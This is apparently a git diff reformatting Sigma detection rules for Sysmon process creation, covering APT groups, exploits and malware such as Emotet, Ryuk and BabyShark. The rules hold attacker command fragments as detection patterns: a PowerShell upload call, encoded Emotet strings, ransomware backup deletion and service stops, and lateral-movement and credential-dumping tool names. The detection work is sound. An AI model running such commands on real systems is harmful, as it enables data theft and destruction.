 Image: C:\Windows\system32\Service.exe
- CommandLine|contains:
+ CommandLine|contains:
 - i
 - u
 selection_autoit:
 ParentImage|endswith: \local\microsoft\Taskbar\autoit3.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - nslookup.exe
 - -q=TXT
 condition: process_creation and (1 of selection_*)
diff --git a/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml b/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml
index 0c7906f64..ffbe14f85 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml
@@ -1,8 +1,7 @@
 title: Defrag Deactivation
 id: 958d81aa-8566-4cea-a565-59ccd4df27b0
 status: test
-description: Detects the deactivation and disabling of the Scheduled defragmentation
- task as seen by Slingshot APT group
+description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
 references:
 - https://securelist.com/apt-slingshot/84312/
 author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
@@ -23,10 +22,10 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \schtasks.exe
- CommandLine|contains:
+ CommandLine|contains:
 - /delete
 - /change
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - /TN
 - \Microsoft\Windows\Defrag\ScheduledDefrag
 condition: process_creation and selection
diff --git a/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml b/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml
index f9d3e438c..15a42d7e9 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml
@@ -1,8 +1,7 @@
 title: TropicTrooper Campaign November 2018
 id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
 status: stable
-description: Detects TropicTrooper activity, an actor who targeted high-profile organizations
- in the energy and food and beverage sectors in Asia
+description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
 references:
 - https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
 author: '@41thexplorer, Microsoft Defender ATP'
@@ -21,7 +20,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc
+ CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc
 condition: process_creation and selection
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml b/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml
index e48e338c6..a8283bbbb 100644
--- a/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml
+++ b/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml
@@ -1,8 +1,7 @@
 title: Potential BearLPE Exploitation
 id: 931b6802-d6a6-4267-9ffa-526f57f22aaf
 status: test
-description: Detects potential exploitation of the BearLPE exploit using Task Scheduler
- ".job" import arbitrary DACL write\par
+description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
 references:
 - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp
 author: Olaf Hartong
@@ -22,10 +21,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \schtasks.exe
- - OriginalFileName: schtasks.exe
+ - Image|endswith: \schtasks.exe
+ - OriginalFileName: schtasks.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - /change
 - /TN
 - /RU
diff --git a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml
index e9f33c85e..1f2119dd2 100644
--- a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml
+++ b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml
@@ -1,8 +1,7 @@
 title: Exploiting SetupComplete.cmd CVE-2019-1378
 id: 1c373b6d-76ce-4553-997d-8c1da9a6b5f5
 status: test
-description: Detects exploitation attempt of privilege escalation vulnerability via
- SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
+description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
 references:
 - https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua
 author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
diff --git a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml
index d6b21c148..4d1ab81c0 100644
--- a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml
+++ b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml
@@ -1,8 +1,7 @@
 title: Exploiting CVE-2019-1388
 id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
 status: stable
-description: Detects an exploitation attempt in which the UAC consent dialogue is
- used to invoke an Internet Explorer process running as LOCAL_SYSTEM
+description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
 references:
 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
 - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
@@ -25,11 +24,11 @@ detection:
 selection:
 ParentImage|endswith: \consent.exe
 Image|endswith: \iexplore.exe
- CommandLine|contains: ' http'
+ CommandLine|contains: ' http'
 rights1:
- IntegrityLevel: System
+ IntegrityLevel: System # for Sysmon users
 rights2:
- User|contains:
+ User|contains: # covers many language settings
 - AUTHORI
 - AUTORI
 condition: process_creation and (selection and ( rights1 or rights2 ))
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml b/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml
index b4f57d86a..22d3742c7 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml
@@ -25,14 +25,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - CommandLine|contains|all:
- - powershell.exe mshta.exe http
- - .hta
- - CommandLine|contains:
- - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server
- Client\Default"
- - cmd.exe /c taskkill /im cmd.exe
- - (New-Object System.Net.WebClient).UploadFile('http
+ - CommandLine|contains|all:
+ - powershell.exe mshta.exe http
+ - .hta
+ - CommandLine|contains:
+ - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
+ - cmd.exe /c taskkill /im cmd.exe
+ - (New-Object System.Net.WebClient).UploadFile('http
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml b/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml
index 5bc979968..90ee0ff0e 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml
@@ -5,8 +5,7 @@ description: Detects potential Dridex acitvity via specific process patterns
 references:
 - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
 - https://redcanary.com/threat-detection-report/threats/dridex/
-author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron
- Systems)
+author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
 date: 2019/01/10
 modified: 2023/02/03
 tags:
@@ -27,7 +26,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_svchost:
 Image|endswith: \svchost.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - C:\Users\
 - \Desktop\
 filter_svchost:
@@ -35,24 +34,22 @@ detection:
 selection_regsvr:
 ParentImage|endswith: \excel.exe
 Image|endswith: \regsvr32.exe
- CommandLine|contains:
+ CommandLine|contains:
 - ' -s '
 - \AppData\Local\Temp\
 filter_regsvr:
- CommandLine|contains: .dll
+ CommandLine|contains: .dll
 selection_anomaly_parent:
 ParentImage|endswith: \svchost.exe
 selection_anomaly_child_1:
 Image|endswith: \whoami.exe
- CommandLine|contains: ' /all'
+ CommandLine|contains: ' /all'
 selection_anomaly_child_2:
 Image|endswith:
 - \net.exe
 - \net1.exe
- CommandLine|contains: ' view'
- condition: process_creation and ((selection_svchost and not filter_svchost) or
- (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and
- 1 of selection_anomaly_child_*))
+ CommandLine|contains: ' view'
+ condition: process_creation and ((selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*))
 falsepositives:
 - Unlikely
 level: critical
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml b/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml
index a5f67a436..63605347c 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml
@@ -24,15 +24,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_ping:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'ping -n '
 - ' echo EEEE > '
 selection_ipconfig:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ipconfig /all
 - \temp\res.ip
 selection_netsh:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - interface ip show config
 - \temp\netsh.res
 condition: process_creation and (1 of selection_*)
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml b/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml
index 7b006a281..aebeaedd9 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml
@@ -1,8 +1,7 @@
 title: Potential Emotet Activity
 id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18
 status: stable
-description: Detects all Emotet like process executions that are not covered by the
- more generic rules
+description: Detects all Emotet like process executions that are not covered by the more generic rules
 references:
 - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/
 - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/
@@ -26,20 +25,20 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -e* PAA'
- - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ
- - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA
- - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA
- - IgAoACcAKgAnACkAOwAkA
- - IAKAAnACoAJwApADsAJA
- - iACgAJwAqACcAKQA7ACQA
+ - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ # $env:userprofile
+ - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA # $env:userprofile
+ - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA # $env:userprofile
+ - IgAoACcAKgAnACkAOwAkA # "('*');$
+ - IAKAAnACoAJwApADsAJA # "('*');$
+ - iACgAJwAqACcAKQA7ACQA # "('*');$
 - JABGAGwAeAByAGgAYwBmAGQ
- - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA
- - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA
- - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA
+ - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA # =$env:temp+(
+ - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA # =$env:temp+(
+ - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA # =$env:temp+(
 filter:
- CommandLine|contains:
+ CommandLine|contains:
 - fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ
 - wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA
 - 8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml b/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml
index 78a5a9c35..de9f45383 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml
@@ -1,10 +1,7 @@
 title: Formbook Process Creation
 id: 032f5fb3-d959-41a5-9263-4173c802dc2b
 status: test
-description: Detects Formbook like process executions that inject code into a set
- of files in the System32 folder, which executes a special command command line
- to delete the dropper from the AppData Temp folder. We avoid false positives by
- excluding all parent process with command line parameters.
+description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
 references:
 - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer
 - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/
@@ -26,28 +23,31 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection1:
+ # Parent command line should not contain a space value
+ # This avoids false positives not caused by process injection
+ # e.g. wscript.exe /B sysmon-install.vbs
 ParentCommandLine|startswith:
 - C:\Windows\System32\
 - C:\Windows\SysWOW64\
 ParentCommandLine|endswith: .exe
 selection2:
- - CommandLine|contains|all:
- - /c
- - del
- - C:\Users\
- - \AppData\Local\Temp\
- - CommandLine|contains|all:
- - /c
- - del
- - C:\Users\
- - \Desktop\
- - CommandLine|contains|all:
- - /C
- - type nul >
- - C:\Users\
- - \Desktop\
+ - CommandLine|contains|all:
+ - /c
+ - del
+ - C:\Users\
+ - \AppData\Local\Temp\
+ - CommandLine|contains|all:
+ - /c
+ - del
+ - C:\Users\
+ - \Desktop\
+ - CommandLine|contains|all:
+ - /C
+ - type nul >
+ - C:\Users\
+ - \Desktop\
 selection3:
- CommandLine|endswith: .exe
+ CommandLine|endswith: .exe
 condition: process_creation and (all of selection*)
 fields:
 - CommandLine
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml b/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml
index e933ace2d..d8b9791bf 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml
@@ -22,7 +22,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains: -i SM-tgytutrc -s
+ CommandLine|contains: -i SM-tgytutrc -s
 condition: process_creation and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml b/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml
index f730a4052..f18ee0e9b 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml
@@ -1,8 +1,7 @@
 title: Potential QBot Activity
 id: 4fcac6eb-0287-4090-8eea-2602e4c20040
 status: stable
-description: Detects potential QBot activity by looking for process executions used
- previously by QBot
+description: Detects potential QBot activity by looking for process executions used previously by QBot
 references:
 - https://twitter.com/killamjr/status/1179034907932315648
 - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
@@ -25,9 +24,9 @@ detection:
 ParentImage|endswith: \WinRAR.exe
 Image|endswith: \wscript.exe
 selection2:
- CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '
+ CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '
 selection3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - regsvr32.exe
 - C:\ProgramData
 - .tmp
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml b/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml
index 6af092a9e..bda5c72f8 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml
@@ -1,17 +1,16 @@
 title: Potential Ryuk Ransomware Activity
 id: c37510b8-2107-4b78-aa32-72f251e7a844
 related:
- - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27
- type: similar
- - id: 0acaad27-9f02-4136-a243-c357202edd74
- type: obsoletes
+ - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27
+ type: similar
+ - id: 0acaad27-9f02-4136-a243-c357202edd74
+ type: obsoletes
 status: stable
 description: Detects Ryuk ransomware activity
 references:
 - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/
 - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
-author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron
- Systems)
+author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)
 date: 2019/12/16
 modified: 2023/02/03
 tags:
@@ -27,11 +26,11 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_reg:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - Microsoft\Windows\CurrentVersion\Run
 - C:\users\Public\
 selection_del:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - del /s /f /q c:\
 - \*.bac
 - \*.bak
@@ -40,10 +39,10 @@ detection:
 Image|endswith:
 - \net.exe
 - \net1.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' stop '
 - ' /y'
- CommandLine|contains:
+ CommandLine|contains:
 - samss
 - audioendpointbuilder
 - unistoresvc_
diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml b/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml
index b8e18f264..8faefa546 100644
--- a/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml
+++ b/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml
@@ -1,8 +1,7 @@
 title: Potential Snatch Ransomware Activity
 id: 5325945e-f1f0-406e-97b8-65104d393fff
 status: stable
-description: Detects specific process characteristics of Snatch ransomware word document
- droppers
+description: Detects specific process characteristics of Snatch ransomware word document droppers
 references:
 - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
 author: Florian Roth (Nextron Systems)
@@ -21,8 +20,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains:
- - shutdown /r /f /t 00
+ CommandLine|contains:
+ - shutdown /r /f /t 00 # Shutdown in safe mode immediately
 - net stop SuperBackupMan
 condition: process_creation and selection
 fields:
@@ -30,7 +29,6 @@ fields:
 - User
 - Image
 falsepositives:
- - Scripts that shutdown the system immediately and reboot them in safe mode are
- unlikely
+ - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml b/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml
index f154e6199..0786d698b 100644
--- a/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml
@@ -1,12 +1,10 @@
 title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
 id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
 status: test
-description: Detects potential BlueMushroom DLL loading activity via regsvr32 from
- AppData Local
+description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
 references:
 - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg
-author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron
- Systems)
+author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
 date: 2019/10/02
 modified: 2023/03/29
 tags:
@@ -22,7 +20,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - regsvr32
 - \AppData\Local\
 - .dll
diff --git a/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml b/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml
index a00b503b2..ac8fbff08 100644
--- a/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml
@@ -1,8 +1,7 @@
 title: APT31 Judgement Panda Activity
 id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
 status: test
-description: Detects APT31 Judgement Panda activity as described in the Crowdstrike
- 2019 Global Threat Report
+description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
 references:
 - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
 author: Florian Roth (Nextron Systems)
@@ -24,15 +23,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_ldifde:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ldifde
 - -f -n
 - eprod.ldf
 selection_lateral_movement:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - copy \\\\
 - c$
- CommandLine|contains:
+ CommandLine|contains:
 - \aaaa\procdump64.exe
 - \aaaa\netsess.exe
 - \aaaa\7za.exe
diff --git a/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml b/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml
index 3768537ea..7f3cf388d 100644
--- a/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml
@@ -1,8 +1,7 @@
 title: Potential Russian APT Credential Theft Activity
 id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
 status: stable
-description: Detects Russian group activity as described in Global Threat Report 2019
- by Crowdstrike
+description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
 references:
 - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
 author: Florian Roth (Nextron Systems)
@@ -22,11 +21,11 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_xcopy:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - xcopy /S /E /C /Q /H \\\\
 - \sysvol\
 selection_adexplorer:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - adexplorer -snapshot "" c:\users\
 - \downloads\
 - .snp
diff --git a/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml b/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml
index 9de6455b5..aaf3eeb84 100644
--- a/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml
@@ -21,8 +21,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
- - /e:jscript
+ CommandLine|contains|all:
+ - /e:jscript # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine
 - \Local\Temp\Errors.bat
 condition: process_creation and selection
 falsepositives:
diff --git a/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml b/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml
index f281b2122..1e4a9a1d5 100644
--- a/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml
@@ -1,8 +1,7 @@
 title: Equation Group DLL_U Export Function Load
 id: d465d1d8-27a2-4cca-9621-a800f37cf72e
 status: stable
-description: Detects a specific export function name used by one of EquationGroup
- tools
+description: Detects a specific export function name used by one of EquationGroup tools
 references:
 - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
 - https://twitter.com/cyb3rops/status/972186477512839170
@@ -23,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - CommandLine|contains: -export dll_u
- - CommandLine|endswith:
- - ',dll_u'
- - ' dll_u'
+ - CommandLine|contains: -export dll_u
+ - CommandLine|endswith:
+ - ',dll_u'
+ - ' dll_u'
 condition: process_creation and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml b/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml
index b51346e16..c38b850de 100644
--- a/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml
@@ -22,16 +22,16 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_cli:
- - CommandLine|contains:
- - Temp\wtask.exe /create
- - '%windir:~-3,1%%PUBLIC:~-9,1%'
- - '/tn "Security Script '
- - '%windir:~-1,1%'
- - CommandLine|contains|all:
- - /E:vbscript
- - C:\Users\
- - .txt
- - /F
+ - CommandLine|contains:
+ - Temp\wtask.exe /create
+ - '%windir:~-3,1%%PUBLIC:~-9,1%'
+ - '/tn "Security Script '
+ - '%windir:~-1,1%'
+ - CommandLine|contains|all:
+ - /E:vbscript
+ - C:\Users\
+ - .txt
+ - /F
 selection_img:
 Image|endswith: Temp\winwsh.exe
 condition: process_creation and (1 of selection_*)
diff --git a/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml b/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml
index 410d021b3..f2cca90da 100644
